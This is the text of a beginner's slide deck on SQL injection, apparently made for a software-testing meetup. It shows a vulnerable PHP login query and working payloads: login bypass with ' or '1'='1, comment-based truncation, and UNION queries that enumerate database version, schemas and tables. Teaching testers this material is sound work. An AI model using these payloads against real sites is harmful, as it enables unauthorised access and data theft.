^ I hope - You gotcha ^
Hashtag for this session
#WTBNT12 , #SQLi , #SQLinjection
: Twitter handle for feedback :
@weekendtesting @Abhinav_Sejpal
G+ https://plus.google.com/events/c1hkhlb3tkmmrc0ikkr5r2sgji0
Tamper Google HTTP request!
If your answer is 'No' then Be ready Meet to 'Nightmare'
Conclusion
Modern websites rely on user input for everything.
They are basically applications which expect various kinds of inputs coming from users to function a certain way.
~ Courtesy @makash ~
SQL stands for Structured Query Language.
(source: Privacyrights.org)
SQLI is old days problem - i shouldn't worry about this.
^^
I am using Java / PHP / RUBY / ASP Modern days framework.
CAKE PHPDemo
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND password = "pass"
Basic PHP statement for Login page :-
SELECT * FROM users where username='".$username."' AND password = '".md5($pass)."'"
*Md5() method is used to encrypt the password.
* Demo at SQL *
#Attack - 1
SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'
Injection code :-
admin' or '1'='1
Attack 1 is rely on 'User name'
SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'
Can't perform this attack on password field due to encryption.
User name = anything' or '1' ='1
password = anything' or '1'='1
* known User name is mandatory Here*
User name is known i.e. 'admin'
<It simply works>
But you can't perform this attack if the user name
http://dev.mysql.com/doc/refman/5.1/en/comments.html
# : Single line comment
"-- " : Sequence to end of line comment
/* Sequence to following block comment*/
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND password = "pass"
What if - I insert comments in first attack
SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"
<< AND password = "pass" >> doesn't execute all
SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"
SQL statement will be always true due '1' = '1' thus doesn't matter, you are knowing user name or not.
Yes - I am done. but what if '#' is not valid input?
* --(space) is syntax
admin' or '1' = '1' --:False
admin' or '1' = '1' -- : True
Mostly people forget to add space, so I use below vector
admin' or '1' = '1' -- space + any one character
E.G. > admin' or '1' = '1' -- Sandy
ssshhh - Do you hear that? - NO
* Identify column gets selected.
* Identify the data set which value will be displayed.
a%' union select 1,2,3,4,5 from users #
a%' union select 1,@@datadir,2,3,4 from users #
a%' union select 1,@@version,3,4,5 from users #
a%' union select 1,table_schema,2,3,4 from information_schema.tables #
a%' union select 1,table_schema,table_name,3,4 from information_schema.tables #
a%' union select 1,table_schema,table_name,3,4 from information_schema.tables where table_schema='sqlhumla'#
There is no silver bullet to stop this - Just Trust your code
~ Keep Hacking your Code ~
-- ^ Google Darling search with #Sqlinjection^--
Feel free to write me at bug.wrangler at outlook.com
https://slides.com/abhinavsejpal/sql-injection-for-beginners/
copyrights 2013-2014 Abhinav Sejpal
-----
Attribution-NonCommercial-NoDerivs 3.0 Unported
Dedicated to my lovely daddy